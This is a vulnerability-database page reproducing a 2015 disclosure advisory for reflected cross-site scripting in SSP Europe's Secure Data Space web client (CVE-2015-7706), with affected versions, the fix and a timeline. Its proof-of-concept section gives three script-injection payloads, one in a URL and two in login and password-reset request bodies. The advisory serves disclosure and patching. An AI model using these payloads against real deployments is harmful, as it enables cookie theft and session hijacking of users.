Vulners
Lucene search
Secure Data Space 3.1.1-2 Cross Site Scripting Vulnerability
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
 | SSP EUROPE Secure Data Space SDS-API Cross-Site Scripting Vulnerability | 13 Jan 201600:00 | – | cnvd |
 | CVE-2015-7706 | 11 Jan 201615:00 | – | cve |
 | CVE-2015-7706 | 11 Jan 201615:00 | – | cvelist |
 | EUVD-2015-7607 | 7 Oct 202500:30 | – | euvd |
 | CVE-2015-7706 | 11 Jan 201615:59 | – | nvd |
 | Secure Data Space 3.1.1-2 Cross Site Scripting | 11 Dec 201500:00 | – | packetstorm |
 | Cross site scripting | 11 Jan 201615:59 | – | prion |
Secure Data Space 3.1.1-2 Cross Site Scripting Vulnerability
1. DETAILS
- ----------
Product: SECURE DATA SPACE
Vendor URL: www.ssp-europe.eu
Type: Cross-site Scripting[CWE-79]
Date found: 2015-09-30
Date published: 2015-12-09
CVSSv2 Score: 4,3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVE: CVE-2015-7706
2. AFFECTED VERSIONS
- --------------------
All product versions (Online, Dedicated, For Linux/Windows) in
Web-Client v3.1.1-2
restApiVersion: 3.5.7-FINAL
sdsServerVersion: 3.4.14-FINAL
3. INTRODUCTION
- ---------------
"The highly secure business solution for easy storage, synchronization, distribution and management of data - regardless of location or device"
(from the vendor's homepage)
4. VULNERABILITY DETAILS
- ------------------------
The Secure Data Share version v3.1.1-2 is vulnerable to multiple unauthenticated Non-Persistent Cross-Site Scripting vulnerabilities when user-supplied input is processed by the server.[0]
#1 Proof-of-Concept:
https://example.com/api/v3//public/shares/downloads/111"}<BODY%20ONLOAD%3dalert('XSS')>
#2 Proof-of-Concept(authType parameter):
POST /api/v3/auth/login
{"login":"a","password":"a","language":1,"authType":"random<script>alert(1)<\/script>random"}
#3 Proof-of-Concept(login parameter):
POST /api/v3/auth/reset_password
{"login":"random<script>alert(1)<\/script>random","language":1}
5. SECURITY RISK
- ----------------
The vulnerabilities can be used to temporarily embed arbitrary script code into the context of the Secure Data Space backend interface, which offers a wide range of possible attacks such as stealing cookies or attacking the browser and its components.
6. SOLUTION
- -----------
Update to Secure Data Space Versions:
Web-Client 3.1.3 - Rev. 3 or higher with
SDS-API 3.5.7 or higher
7. REPORT TIMELINE
- ------------------
2015-09-30: Vulnerability discovered
2015-10-02: Vendor notified
2015-10-02: Vendor acknowledges the vulnerability
2015-10-05: CVE requested from MITRE
2015-10-05: CVE-2015-7706 assigned
2015-10-13: Vendor releases update and security advisory[0]
2015-12-09: Advisory released
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Dec 2015 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.00255